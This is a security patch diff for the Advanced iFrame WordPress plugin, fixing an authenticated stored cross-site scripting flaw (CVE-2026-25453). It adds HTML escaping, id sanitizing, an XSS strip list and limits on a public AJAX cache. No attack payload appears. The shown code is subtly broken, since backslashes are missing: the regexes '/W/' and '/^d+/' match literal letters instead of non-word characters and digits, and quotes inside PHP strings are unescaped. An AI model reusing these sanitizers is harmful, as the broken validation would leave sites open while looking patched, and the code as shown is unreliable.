CVE-2026-25453: Advanced iFrame <= 2025.10 – Authenticated (Contributor+) Stored Cross-Site Scripting (advanced-iframe)

--- a/advanced-iframe/advanced-iframe-admin-page.php
+++ b/advanced-iframe/advanced-iframe-admin-page.php
@@ -248,16 +248,18 @@
           ));
           $text = balanceTags($text, true);
           $devOptions[$item] = stripslashes($text);
+        } elseif ($item === 'id') {
+          $newtext = preg_replace("/W/", "_", $text);
+          // remove trailing numbers
+          $newtext = preg_replace('/^d+/', '', $newtext);
+		  if (!empty($newtext)) {
+		    $devOptions[$item] = $newtext;
+		  }
         } elseif (function_exists('sanitize_text_field')) {
           $devOptions[$item] = stripslashes(sanitize_text_field($text));
         } else {
           $devOptions[$item] = stripslashes($text);
         }
-        if ($item === 'id') {
-          $devOptions[$item] = preg_replace("/W/", "_", $text);
-          // remove trailing numbers
-          $devOptions[$item] = preg_replace('/^d+/', '', $devOptions[$item]);
-        }

         // we check if we have an invalid configuration!
         if ($devOptions['shortcode_attributes'] === 'false' && $devOptions['use_shortcode_attributes_only'] === 'true') {
--- a/advanced-iframe/advanced-iframe.php
+++ b/advanced-iframe/advanced-iframe.php
@@ -2,7 +2,9 @@
 /*
 Plugin Name: Advanced iFrame
 Plugin URI: https://wordpress.org/plugins/advanced-iframe/
-Version: 2025.10
+Version: 2026.0
+Requires at least: 5.5
+Requires PHP: 7.4
 Text Domain: advanced-iframe
 Domain Path: /languages
 Author: Michael Dempfle
@@ -33,7 +35,7 @@
 // ini_set('display_startup_errors', 1);
 // error_reporting(E_ALL);

-$aiVersion = '2025.10';
+$aiVersion = '2026.0';
 // check $aiJsSize

 $cons_advancediFrame = null;
@@ -970,7 +972,7 @@

       function createMinimizedAiJs($backend) {
         global $aiVersion;
-        $aiJsSize = 87421;
+        $aiJsSize = 88293;
         $newContent = file_get_contents(dirname(__FILE__) . '/js/ai.js');
         $oldFileName = dirname(__FILE__) . '/js/ai.min.js';
         if ((strlen($newContent) == $aiJsSize) && file_exists($oldFileName)) {
@@ -1389,20 +1391,37 @@
         return $content;
       }

-      // The function that handles the AJAX request
+	 /**
+	  * Public AJAX endpoint intentionally exposed to unauthenticated users.
+	  * Used exclusively for creating a temporary FIFO cache.
+	  * No user data or privileged operations performed.
+	  * Cache is only active if the feature "Add iframe URL as param" with hash/hashrewrite is enabled.
+	  * The cache size is reported in the administration so the owner can check, if it is full.
+	  */
       function aip_map_url_callback() {
         check_ajax_referer('aip-parameter-nonce', 'security');
-        $url = urldecode($_POST['url']);
+
+		// check if feature is active
+         $options = get_option($this->adminOptionsName);
+         $hashShortCodeActive = $options['add_iframe_url_as_param_prefix'] == "hash" ||
+		   $options['add_iframe_url_as_param_prefix'] == "hashrewrite";
+
+		if (!$hashShortCodeActive) {
+	       echo "Request_not_valid";
+           die();
+		}
+
+		$url = urldecode($_POST['url']);
 		if (filter_var($url, FILTER_VALIDATE_URL) === FALSE) {
-	      echo "URL_NOT_VALID";
+	      echo "Request_not_valid";
 		  die();
 		}
 		// we use a default wp table as the data is normally quite small.
 		$paramData = get_option("advancediFrameParameterData");
 		if (!empty($paramData)) {
 		  if(count($paramData) > 1000) {
-			echo "TOO_MANY_CACHE_ENTRIES";
-			die();
+			// Remove first cache element so we have a FIFO cache with a max size of 1000
+			array_shift($paramData);
 		  }
 		  $nextid = 1;
           foreach ($paramData as $entry) {
--- a/advanced-iframe/includes/advanced-iframe-admin-default.php
+++ b/advanced-iframe/includes/advanced-iframe-admin-default.php
@@ -71,7 +71,7 @@
       $ovars = get_object_vars($current_user->data);
       foreach ($ovars as $key => $value) {
         if (!is_object($value) && !is_array($value)) {
-          $userinfo_html .= $key . " => " . $value . "<br>";
+          $userinfo_html .= esc_html($key) . " => " . esc_html($value) . "<br>";
         }
       }
       $userinfo_html .= '</span>' . $extraUserInfo;
@@ -82,7 +82,7 @@
       $usermeta_html .= '<span id="meta-help">';
       foreach ($all_meta_for_user as $key => $value) {
         if (!is_object($value) && !is_array($value)) {
-          $usermeta_html .= $key . " => " . $value . "<br>";
+          $usermeta_html .= esc_html($key) . " => " . esc_html($value) . "<br>";
         }
       }
       $usermeta_html .= '</span>' . $extraUserInfo;
@@ -129,7 +129,7 @@
       $style_fs = '';
     }
     printTextInput(false, $devOptions, __('Style', 'advanced-iframe'), 'style', __('You can define styles for the iframe if you like. The recommended way is to put the styles in a css file and use the class option. With the button below the width, height, content_id, content_styles, hide_content_until_iframe_color and the needed styles above for a fullscreen iframe are set. Also check the settings at the height where you can do calculations to add fixed headers/footers. Shortcode attribute: style=""' . $style_fs, 'advanced-iframe'));
-    printTextInput(false, $devOptions, __('Id', 'advanced-iframe'), 'id', __('Enter the 'id' attribute of the iframe. Allowed values are only a-zA-Z0-9_. Ids cannot start with a number!!! Do NOT use any other characters because the id is also used to generate unique javascript functions! Other characters will be removed when you save! If a src directly in a shortcode is set and no id than an id is generated automatically if several iframes are on one page to avoid configuration problems. Shortcode attribute: id=""', 'advanced-iframe'));
+    printTextInput(false, $devOptions, __('Id', 'advanced-iframe'), 'id', __('Enter the 'id' attribute of the iframe. Allowed values are only a-zA-Z0-9_. Ids cannot start with a number!!! This settings is mandatory. If the sanitized value is invalid the old value is used. Do NOT use any other characters because the id is also used to generate unique javascript functions! Other characters will be removed when you save! If a src directly in a shortcode is set and no id than an id is generated automatically if several iframes are on one page to avoid configuration problems. Shortcode attribute: id=""', 'advanced-iframe'));
     printTextInput(false, $devOptions, __('Name', 'advanced-iframe'), 'name', __('Enter the 'name' attribute of the iframe. Shortcode attribute: name=""', 'advanced-iframe'));
     printTrueFalse(false, $devOptions, __('Allow full screen', 'advanced-iframe'), 'allowfullscreen', __('allowfullscreen is an HTML attribute that enables videos to be displayed in fullscreen mode. Currently this is a new html attribute not supported by all browsers. So please check  all of the browsers you want to support. Shortcode attribute: allowfullscreen="true" or allowfullscreen="false"', 'advanced-iframe'));

--- a/advanced-iframe/includes/advanced-iframe-admin-external-workaround.php
+++ b/advanced-iframe/includes/advanced-iframe-admin-external-workaround.php
@@ -184,7 +184,8 @@
       printTrueDebugFalse($devOptions, __('Use postMessage for communication', 'advanced-iframe'), 'use_post_message', __('From version 7.4, this is the default communication way between the iframe and the parent for new installations of the pro version. See <a class="post-message-help-link" href="#">here</a> for the two different communication ways and what is the best one for you. If you have any problems with windows.postMessage select "Debug" and additional log information about the transfered data is printed to the browser console. "Debug Javascript" on the options tab does also automatically enable the debug mode! If you enable this you also get infos about messages which do NOT belong to advanced iframe! Use F12 at your browser to open the developer tools. The administration does save the current url as targetOrigin into the ai_external.js. If have a multi site or you include your page into different parents than you need the pro version and select "Support WP multisite" to "Yes" as than * is used as targetOrigin. Also use post communication if you have a https page in the iframe and your page is http. Please see <a href="//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/external-workaround-with-post-message#e51" target="_blank">example 51</a> for this advanced setup! <a href="#mirp" class="link-id-external-ai-overview">Please see below</a> how to configure ai_external.js directly. If you only enable this in ai_external.js directly you need to use use_post_message="true"/"debug" in the shortcode! You can also use messages from other tools that send the height like iframeSizer. See <a target="_blank" href="https://www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/integrate-iframe-sizer-script">here</a> for more details.', 'advanced-iframe'), '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/external-workaround-with-post-message#e51', true);
       if ($evanto || $isDemo) {
         printTrueFalse(true, $devOptions, __('Support WP multisite', 'advanced-iframe'), 'multi_domain_enabled', __('This is only supported if you select "Use postMessage for communication" to "yes" or "debug". Please read the documentation at "Use postMessage for communication" how to use this setting!', 'advanced-iframe'), "false", '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/external-workaround-with-post-message', true);
-        printTextInput(true, $devOptions, __('i-20-Include content directly from the iframe', 'advanced-iframe'), 'data_post_message', __('When you enable post communication you can read elements from the iframe and transfer it to the parent and include it there. This is like the feature "Include content directly" from the "Add files/content" from the next tab  but more powerful. You can define here as many elements you like and insert it to the parent page. To enable this setting you need to specify the element of the parent and the element of the iframe separated by a |. Several settings are separated by , e.g. #c-id|#content,#s-id|#some-images,#p-id|#iframe-right p:nth-child(2). You can use any valid <a class="jquery-help-link" href="#">jQuery selector pattern</a> here! Please read the section "<a class="howto-id-link" href="#">How to find the id and the attributes</a>" to find the right id or class. Currently, the iframe is NOT hidden by default. After the setup you need to set display:none; on the basic tab at "Style". Currently, there are no additional settings like for the same domain. So make sure that e.g. the divs you want to add the content have e.g. the correct height for optimal display! This setting cannot be set by a shortcode. <a href="#mirp" class="link-id-external-ai-overview">Please see below</a> how to configure ai_external.js directly.', 'advanced-iframe'), 'text', '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/external-workaround-with-post-message#e52', true);
+        printTextInput(true, $devOptions, __('i-20-Include content directly from the iframe', 'advanced-iframe'), 'data_post_message', __('When you enable post communication you can read elements from the iframe and transfer it to the parent and include it there. This is like the feature "Include content directly" from the "Add files/content" from the next tab  but more powerful. You can define here as many elements you like and insert it to the parent page. To enable this setting you need to specify the element of the parent and the element of the iframe separated by a |. Several settings are separated by , e.g. #c-id|#content,#s-id|#some-images,#p-id|#iframe-right p:nth-child(2). You can use any valid <a class="jquery-help-link" href="#">jQuery selector pattern</a> here! Please read the section "<a class="howto-id-link" href="#">How to find the id and the attributes</a>" to find the right id or class. Currently, the iframe is NOT hidden by default. After the setup you need to set display:none; on the basic tab at "Style". Currently, there are no additional settings like for the same domain. So make sure that e.g. the divs you want to add the content have e.g. the correct height for optimal display! <br><strong>Important</strong>: For security reasons, you must configure this feature in both ai_external.js and the plugin starting with version 2026.0. You can do this by configuring everything here, or by setting it in the shortcode with data_post_message="". AND configuring it with <a href="#mirp" class="link-id-external-ai-overview">dataPostMessage</a>. The plugin removes <script> tags from HTML content to help prevent XSS (Cross-Site Scripting) attacks.', 'advanced-iframe'), 'text', '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/external-workaround-with-post-message#e52', true);
+
         printTextInput(true, $devOptions, __('Scroll to top', 'advanced-iframe'), 'external_scroll_top', __('This solution is only needed if your page inside the iframe is NOT reloading the page when going from one page to the next. If you have an Ajax form no onload event is fired! This solution does send the scroll to top event to the parent if you click on any of the specified elements here! You can use any valid <a class="jquery-help-link" href="#">jQuery selector pattern</a> here! Please read the section "<a class="howto-id-link" href="#">How to find the id and the attributes</a>" to find the right id or class. E.g. "button" would send the on load event if you click on any HTML button element. If you like to scroll to the top of the iframe, you need to select "iframe" on the "Advanced Settings tab -> General advanced features -> Scrolls the parent window/iframe to the top". You need to use postMessage communication for this feature. This setting cannot be set by a shortcode. <a href="#mirp" class="link-id-external-ai-overview">Please see below</a> how to configure ai_external.js directly.', 'advanced-iframe'), 'text', '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/external-workaround-with-post-message#e51', true);
       }
       ?></table>
@@ -253,7 +254,7 @@
           <li>domainMultisite - Enable/disable multi site settings. See above. Valid values are "true", "false".</li>
           <li>usePostMessage -  Enable/disable the usage of postMessage for communication. See above. Valid values are true, false.</li>
           <li>debugPostMessage -  Enable/disable the debug of postMessage for communication. See above. Valid values are true, false.</li>
-          <li>dataPostMessage - Defines the elements that should be transfered to the client. See above. </li>
+          <li>dataPostMessage - Defines the elements that should be transfered to the client. Needs to be also set as shortcode because of security reasons OR fully in the administration. See above. </li>
           <li>scroll_to_top - Defines the elements where a scroll to top event is sent back to the parent. See above.</li>
           ', 'advanced-iframe');

--- a/advanced-iframe/includes/advanced-iframe-admin-parameters.php
+++ b/advanced-iframe/includes/advanced-iframe-admin-parameters.php
@@ -9,13 +9,17 @@
 printTextInput(false, $devOptions, __('URL forward parameters', 'advanced-iframe'), 'url_forward_parameter', __('Define the parameters that should be passed from the browser url to the iframe url. Please separate the parameters by ','. Using "ALL" does forward every parameter.<br />GET and POST parameters are supported!<br />Pro users can also map incoming parameters to a different parameter. Wordpress has a couple of <a href="https://codex.wordpress.org/Reserved_Terms" target="_blank">reserved words</a> which can't be used in urls. So if you want to pass the parameter "name" (reserved word) to your iframe you can do a mapping with "ainame|name". Than the parameter "ainame=hallo" will be passed as "name=hallo" to the iframe. This can also be used if the parameters of the 2 pages do not match. Several mappings can be separated with ',' like normal parameters. In e.g. TinyWebGallery this enables you to jump directly to an album or image although TinyWebGallery is included in an iframe. If your parameters contain [] you can use {{ }} which will internally replaced. Since WordPress 5.5 the "page" parameter also causes a 301 redirect. If you still like/need to use it. Go to "Options -> Technical options -> Fix WordPress 5.5 page parameter change" and set it to "Yes". Shortcode attribute: url_forward_parameter=""', 'advanced-iframe'));
 if ($evanto || $isDemo) {
   printTextInput(true, $devOptions, __('Map parameter to url/ Use parameter value as iframe url', 'advanced-iframe'), 'map_parameter_to_url', __('You can map an url parameter value pair to an url or pass the url directly which should be opened in the iframe. If you e.g. have a page with the iframe, and you like to have different content in the iframe depending on an url parameter than this is the setting you have to use. You have to specify this setting in the following syntax "parameter|value|url" e.g. "show|1|https://www.advanced-iframe.com". If you than open the parent page with ?show=1 than https://www.advanced-iframe.com is opened inside the iframe. You can also specify several mappings by separating them by ','.<br />GET and POST parameters are supported!<br />You can also only specify 1 parameter here! The value of this parameter is than used as iframe url. e.g. show=https%3A%2F%2Fwww.tinywebgallery.com%3Fparam=value. You need to encode the url if you pass it in the url. Especially ? (%3F) and & (%26)! Please note that because of security reason only whitelisted chars [a-zA-Z0-9/:?&.] are allowed. Encoded parameters in the urls are not supported because all input is decoded and checked. If you add :sameDomain, then no urls with http/s are not used as iframe URL! e.g. show::sameDomain. See the next setting how to update this url dynamically. If no parameter/value pair does match the normal src attribute of the configuration is used. Shortcode attribute: map_parameter_to_url=""', 'advanced-iframe'));
-  printSameRemote($devOptions, __('i-20-Add iframe URL as param', 'advanced-iframe'), 'add_iframe_url_as_param', __('With this setting the URL of the iframe is added as parameter to the current URL. The parameter can be defined in the setting before. If this is not set the default "iframe" is used (be aware of <a href="https://codex.wordpress.org/Reserved_Terms" target="_blank">reserved words</a>!). This feature is only enabled for the remote domain if you also enable auto height for remote domains because the URL of the iframe is sent with the same request. This enables bookmarkable URLs where you go directly to the last page in the iframe. The history api which enables the change of the URL is only supported by modern browsers. For older browsers the URL is simply not changed. See https://caniuse.com/?search=pushstate. Shortcode attribute: add_iframe_url_as_param="same", add_iframe_url_as_param="remote" or add_iframe_url_as_param="false" ', 'advanced-iframe'), '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/add-iframe-url-to-parent', true);
+  printSameRemote($devOptions, __('i-20-Add iframe URL as param', 'advanced-iframe'), 'add_iframe_url_as_param', __('With this setting the URL of the iframe is added as parameter to the current URL. The parameter can be defined in the setting before. If this is not set the default "iframe" is used (be aware of <a href="https://codex.wordpress.org/Reserved_Terms" target="_blank">reserved words</a>!). This feature is only enabled for the remote domain if you also enable auto height for remote domains because the URL of the iframe is sent with the same request. This enables bookmarkable URLs where you go directly to the last page in the iframe. Shortcode attribute: add_iframe_url_as_param="same", add_iframe_url_as_param="false". If you use the shortcode add_iframe_url_as_param="remote", you also need to set this before ai_external.js like shown in the demo.', 'advanced-iframe'), '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/add-iframe-url-to-parent', true);

   printTrueFalse(true, $devOptions, __('i-40-Add params directly', 'advanced-iframe'), 'add_iframe_url_as_param_direct', __('Enabling this does not add the full iframe URL but only the parameters of the iframe. You need also to configure either "URL forward parameters" or use URL placeholders (see basic tab). This works on the <a target="_blank"  href="//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/add-iframe-params-to-parent">same</a> and for <a target="_blank"  href="//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/add-iframe-params-to-parent-remote">remote</a> domains. Please go there for a detailed description. Shortcode attribute: add_iframe_url_as_param_direct="true" or add_iframe_url_as_param_direct="false" ', 'advanced-iframe'), 'false', '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/add-iframe-params-to-parent', false);

-  $cleanHashButton = 'Delete the hash/URL cache by clicking <a class="confirmation-hash post" href="admin.php?page=advanced-iframe&remove-url-hash-cache=true">here</a>. Deleting the cache can be useful during setup and if you have changed URLs. It should NOT be done afterwards if defaults ids are used for the URLs as they are generated in order and already bookmarked URLs might change.';
+  $cacheSize = count(get_option("advancediFrameParameterData", []));

-  printTextInput(true, $devOptions, __('i-40-Prefix/id/urlrewrite for iframe URL', 'advanced-iframe'), 'add_iframe_url_as_param_prefix', __('With this setting you can define a prefix which all (most) of your pages in the iframe have. This prefix is than not added to the URL but added internally. This does reduce the length of the parameter value. The prefix has to be without http:// or https://. So a prefix could be www.advanced-iframe.com/demos/. If your pages are e.g. at www.advanced-iframe.com/demos/example1.htm and www.advanced-iframe.com/demos/example2.htm than the page parameter is only page=example2.htm and not page=www.advanced-iframe.com%2Fdemos%2Fexample2.htm.<br> <br>Additionally, this setting has 2 special keywords: "hash" and "hashrewrite". If you enter "hash" then the URL is stored in the database and only an id is used. So the URL is extended by e.g. ?iframe=4. "hashrewrite" additionally does a URL rewrite. So the URL is extended by /iframe/4. The parameter is set at "Map parameter to URL" and is "iframe" by default. IMPORTANT: if you want to use "hashrewrite" you need to set this and "Map parameter to URL" here as well (and in the shortcode) because in the shortcode alone it is loaded too late! As other plugins also can rewrite the URL please check if they are compatible! First use "hash" and then try "hashrewrite"! "hashrewrite" is only possible if you do not use "plain" as "Permalink Settings" (pagename is the one tested the most!). Also it takes a little bit until the id is read from the database. So the URL is changed with a small delay! See the demos for a working examples.</p><p class="description"><strong>With "hashrewrite" are many individual optimizations possible</strong> which depend on the parent and iframe url. Like attaching a specific unique parameter from the iframe url to the parent and load the full url based on this. Please contact the <a href="https://www.advanced-iframe.com/advanced-iframe/advanced-iframe-support" target="_blank">support</a> for an individual solution.</p><p class="description">Shortcode attribute: add_iframe_url_as_param_prefix=""', 'advanced-iframe') . $cleanHashButton, 'text', '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/add-iframe-url-to-parent', false);
+  $currentCacheSize =  '<p class="description">Number of cache entries: <strong>'.$cacheSize.'/1000</strong>. Please note that the cache is filled by your users, bots and in the worst case even by hackers because the cache needs to be public! The cache is only active if the hash feature is active. Each of your pages is one cache entry and if it is full, the oldest one will be removed. Please monitor the cache when you enable this feature. If the cache size seems unrealistic I recommend not to use it! Invalid entries are not doing any harm but filling your cache. A full cache will cause that old bookmarks are not working anymore!</p>';
+
+  $cleanHashButton =  $currentCacheSize .'<p class="description">Delete the hash/URL cache by clicking <a class="confirmation-hash post" href="admin.php?page=advanced-iframe&remove-url-hash-cache=true">here</a>. Deleting the cache can be useful during setup and if you have changed URLs. It should NOT be done afterwards if defaults ids are used for the URLs as they are generated in order and already bookmarked URLs might change.</p>';
+
+  printTextInput(true, $devOptions, __('i-40-Prefix/id/urlrewrite for iframe URL', 'advanced-iframe'), 'add_iframe_url_as_param_prefix', __('With this setting you can define a prefix which all (most) of your pages in the iframe have. This prefix is than not added to the URL but added internally. This does reduce the length of the parameter value. The prefix has to be without http:// or https://. So a prefix could be www.advanced-iframe.com/demos/. If your pages are e.g. at www.advanced-iframe.com/demos/example1.htm and www.advanced-iframe.com/demos/example2.htm than the page parameter is only page=example2.htm and not page=www.advanced-iframe.com%2Fdemos%2Fexample2.htm.<br> <br>Additionally, this setting has 2 special keywords: "hash" and "hashrewrite". If you enter "hash" then the URL is stored in the database and only an id is used. So the URL is extended by e.g. ?iframe=4. "hashrewrite" additionally does a URL rewrite. So the URL is extended by /iframe/4. The parameter is set at "Map parameter to URL" and is "iframe" by default. IMPORTANT: if you want to use "hash" or "hashrewrite" you need to set this and "Map parameter to URL" here <strong>AND</strong> in the shortcode, because in the shortcode alone it is loaded too late! As other plugins also can rewrite the URL please check if they are compatible! First use "hash" and then try "hashrewrite"! "hashrewrite" is only possible if you do not use "plain" as "Permalink Settings" (pagename is the one tested the most!). Also it takes a little bit until the id is read from the database. So the URL is changed with a small delay! See the demos for a working examples.</p><p class="description"><strong>With "hashrewrite" are many individual optimizations possible</strong> which depend on the parent and iframe url. Like attaching a specific unique parameter from the iframe url to the parent and load the full url based on this. Please contact the <a href="https://www.advanced-iframe.com/advanced-iframe/advanced-iframe-support" target="_blank">support</a> for an individual solution.</p>'. $cleanHashButton .'<p class="description">Shortcode attribute: add_iframe_url_as_param_prefix=""', 'advanced-iframe'), 'text', '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/add-iframe-url-to-parent', false);

   /*
   Features that need further customizations depending on parent/iframe url. They cannot be used out of the box and need changes in the code!
@@ -24,7 +28,7 @@
                                      hashrewrite:title - Depending how unique the parameters of an iframe URL is a specific parameter can be used as key.
   */

-  printSameRemote($devOptions, __('Use the iframe title for the parent', 'advanced-iframe'), 'use_iframe_title_for_parent', __('Enabling this does set the title of the iframe on the parent page once available. This feature works on the same and the remote domain. The original title is shown until the new one is loaded. The original title cannot be hidden as this would be a global setting and also affecting all pages of a website. Shortcode attribute: use_iframe_title_for_parent="same". For the external workaround you need to set it to "Remote Domain" or use use_iframe_title_for_parent="remote" in the ai_external.js settings.', 'advanced-iframe'), '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/add-iframe-url-to-parent', true);
+  printSameRemote($devOptions, __('Use the iframe title for the parent', 'advanced-iframe'), 'use_iframe_title_for_parent', __('Enabling this does set the title of the iframe on the parent page once available. This feature works on the same and the remote domain. The original title is shown until the new one is loaded. The original title cannot be hidden as this would be a global setting and also affecting all pages of a website. Shortcode attribute: use_iframe_title_for_parent="same". For the external workaround you need to set it to "Remote Domain" or set use_iframe_title_for_parent="remote" AND use_iframe_title_for_parent="remote" in the ai_external.js settings. Since 2026.0 the shortcode setting is mandatory if you configure ai_external.js because of security reasons.', 'advanced-iframe'), 'https://www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/add-iframe-url-to-parent/add-iframe-url-as-param-remote-domain', true);

 }
 echo '</table>';
--- a/advanced-iframe/includes/advanced-iframe-admin-resize.php
+++ b/advanced-iframe/includes/advanced-iframe-admin-resize.php
@@ -21,7 +21,7 @@
   printNumberInput(false, $devOptions, __('i-20-Resize delay', 'advanced-iframe'), 'onload_resize_delay', __('Sometimes the external page does not have its full height after loading because e.g. parts of the page are build by Javascript. If this is the case you can define a timeout in milliseconds until the resize is called. Otherwise leave this field empty.. Shortcode attribute: onload_resize_delay=""', 'advanced-iframe'));

   printHeightTrueFalse($devOptions, __('i-20-Store height in cookie', 'advanced-iframe'), 'store_height_in_cookie', __('If you enable the dynamic resize the value is calculated each time when the page is loaded. So each time it took a little time until the resize of the iframe is done. And this is visible sometimes if the content page loads very slow or is on a different domain or depends on the browser. By enabling this option the last calculated height is stored in a cookie and available right away. The iframe is first resized to this height and later on when the new height comes it is updated. By default, this is disabled because when you have dynamic content in the iframe it is possible that the iframe does not shrink. So please try this setting with your destination page. <strong>If you use several iframes on one page please don't use this because currently only one cookie per page is supported. Also, you cannot use this feature if you include the ai.js file at the bottom. If you use iframe on different pages different id are needed because the id is part of the cookie</strong>. Shortcode attribute: store_height_in_cookie="true" or store_height_in_cookie="false" ', 'advanced-iframe'));
-  printHeightNumberInput(false, $devOptions, __('i-20-Additional height', 'advanced-iframe'), 'additional_height', __('If you like that the iframe is higher than the calculated value you can add some extra height here. This number is then added to the calculated one. This is e.g. needed if one of your tested browsers displays a scrollbar because of 1 or 2 pixel. Or you have an invisible area that is shown by the click on a button that can increase the size of the page. This option is NOT possible when "Store height in cookie" is enabled because this would cause that the height will increase at each reload of the parent page. If you use several iframes please use the same setting for all of them because there is only one global variable. Shortcode attribute: additional_height=""', 'advanced-iframe'));
+  printHeightNumberInput(false, $devOptions, __('i-20-Additional height', 'advanced-iframe'), 'additional_height', __('If you like that the iframe is higher than the calculated value you can add some extra height here. This number is then added to the calculated one. This is e.g. needed if one of your tested browsers displays a scrollbar because of 1 or 2 pixel. Or you have an invisible area that is shown by the click on a button that can increase the size of the page. This option is NOT possible when "Store height in cookie" is enabled because this would cause that the height will increase at each reload of the parent page. If you use several iframes please use the same setting for all of them because there is only one global variable.  Shortcode attribute: additional_height=""', 'advanced-iframe'));
   printTrueFalse(false, $devOptions, __('i-20-Resize iframe to content width', 'advanced-iframe'), 'onload_resize_width', __('If you like that the iframe is resized to the width of the content you should set this to 'Yes'. PLEASE NOTE: Normally this is NOT what you want. Most people like a width of 100%! If you have a responsive layout this setting should be false. If your iframe has only a width of 1px disable the feature! Please note that this is done by Javascript and only in combination with resizing the content height! So if a user has Javascript deactivated or a not supported browser the iframe does not get resized. This setting generates the code onload="aiResizeIframe(this, 'true');" to the iframe. Shortcode attribute: onload_resize_width="true" or onload_resize_width="false" ', 'advanced-iframe'));
   if (!$evanto) {
     printNumberInput(false, $devOptions, __('i-20-Resize on click events', 'advanced-iframe'), 'resize_on_click', __('If you like that the iframe is resized after clicks  in the iframe please enter the timeout here. Otherwise leave this field empty. The number is the timeout in milliseconds until the resize is called. This setting intercepts the clicks on the element specified below. Catching happens BEFORE the actual action on e.g. the link. Therefore you need to enter a number > 0 because the original action is done later. 100 is a good value to start with! If you have e.g. a slide down effect you should add the time here it takes to get the full height. This setting does only work on the SAME domain by default. If you like to get this working across different domains use the "Resize on Element resize" feature of the pro version. Shortcode attribute: resize_on_click=""', 'advanced-iframe'));
--- a/advanced-iframe/includes/advanced-iframe-admin-zoom.php
+++ b/advanced-iframe/includes/advanced-iframe-admin-zoom.php
@@ -7,7 +7,7 @@
   echo '<p>';
   _e('All major browsers do support the zoom of iframes. Depending on your setup you can use a static zoom factor or even automatic zoom which does zoom the content depending on the available space. Please check the examples how the different zoom settings do work. Please note that the zoom below does only zoom the iframe. When you use the "Show only a part of the iframe" the inner content is zoomed. For zoom options of the viewport please check the settings at "Show only a part of the iframe"', 'advanced-iframe');
   echo '</p><table class="form-table">';
-  printNumberInput(true, $devOptions, __('Zoom iframe', 'advanced-iframe'), 'iframe_zoom', __('You can zoom the content of the iframe with this setting. E.g. entering 0.5 does resize the iframe to 50%. At the iframe width and height you need to enter the FULL size of the iframe. So if you enter width = 1000, height = 500 and zoom = 0.5 than the result will be 500x250. The following browsers are supported: IE8-11, Firefox, Chrome, Safari, Opera, Edge. Older versions of IE are not supported. Please test all the browsers you want to support with your page because not all pages do look good in a zoomed mode! "Show only a part of an iframe" and "Resize iframe to content height" are supported. Shortcode attribute: iframe_zoom=""', 'advanced-iframe'), 'text', '', '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/zoom-iframe-content');
+  printNumberInput(true, $devOptions, __('Zoom iframe', 'advanced-iframe'), 'iframe_zoom', __('You can zoom the content of the iframe with this setting. E.g. entering 0.5 does resize the iframe to 50%. At the iframe width and height you need to enter the FULL size of the iframe. So if you enter width = 1000, height = 500 and zoom = 0.5 than the result will be 500x250. "Show only a part of an iframe" and "Resize iframe to content height" are supported. Shortcode attribute: iframe_zoom=""', 'advanced-iframe'), 'text', '', '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/zoom-iframe-content');
   printTrueFalse(true, $devOptions, __('i-20-Zoom absolute fix', 'advanced-iframe'), 'use_zoom_absolute_fix', __('Sometimes the zoom measurements need an additional position:absolute to work correctly. Only set this to true if the zooms does not work as expected. Shortcode attribute: use_zoom_absolute_fix="true" or use_zoom_absolute_fix="false"', 'advanced-iframe'));
   printSameRemote($devOptions, __('Auto zoom iframe', 'advanced-iframe'), 'auto_zoom', __('This feature does automatically calculates the needed zoom factor to fit the iframe page into the parent page. Especially when you have a responsive website but the remote website is not responsive this is the only way that the page in the iframe does also zoom. Many smartphones and tablets to automatically zoom the parent page but not the iframe page. So there this feature can also be used. This feature works on the same domain and if you are able to use the external workaround and use auto height there (otherwise the width does not get transferred). Shortcode attribute: auto_zoom="same", auto_zoom="remote" or auto_zoom="false" ', 'advanced-iframe'), '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/auto-zoom-iframe-content', true);
   printTextInput(true, $devOptions, __('i-20-Auto zoom by ratio', 'advanced-iframe'), 'auto_zoom_by_ratio', __('This setting can be used on the SAME domain if the height of the page cannot be measured but the ratio of the page is known. And if the width also cannot be measured automatically but is known because the iframe page has a fixed width, you can specify this width by adding with a pipe like ratio|width. E.g. 0.80|800. If you know the the ratio and the width, this setting does also work on REMOTE domains. You don't even need access to the remote domain! For remote domains also select SAME in the setting before as remote means that the height/width information is sent from the remote domain which is not the case here. Shortcode attribute: auto_zoom_by_ratio=""', 'advanced-iframe'), 'text', '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/auto-zoom-iframe-content#e35');
--- a/advanced-iframe/includes/advanced-iframe-main-css.php
+++ b/advanced-iframe/includes/advanced-iframe-main-css.php
@@ -278,7 +278,10 @@
     left: 0px;
     line-height: 1.2;
     font-size: 90%;
-    z-index: 999999;}';
+    z-index: 999999;
+	background-image: none !important;
+	background: none !important;
+	}';
 }

 if ($fullscreen_button !== 'false') {
--- a/advanced-iframe/includes/advanced-iframe-main-helper.php
+++ b/advanced-iframe/includes/advanced-iframe-main-helper.php
@@ -494,7 +494,11 @@
     return ($value === 'true' || $value === 'false') ? $value : 'false';
   }

-  static $replaceBasicXSS = array('"', "'", ' ', '(', ')', ';', '}');
+  static function filterXSSNumber($value) {
+    return preg_match('/^d+(?:[;,]d+)*$/', $value) ? $value : 0;
+  }
+
+  static $replaceBasicXSS = array('"', "'", ' ', '(', ')', ';', '}', 'onerror');

   static function filterBasicXSS($value) {
     return empty($value) ? '' : str_replace(static::$replaceBasicXSS, '', $value);
--- a/advanced-iframe/includes/advanced-iframe-main-iframe.php
+++ b/advanced-iframe/includes/advanced-iframe-main-iframe.php
@@ -133,7 +133,7 @@
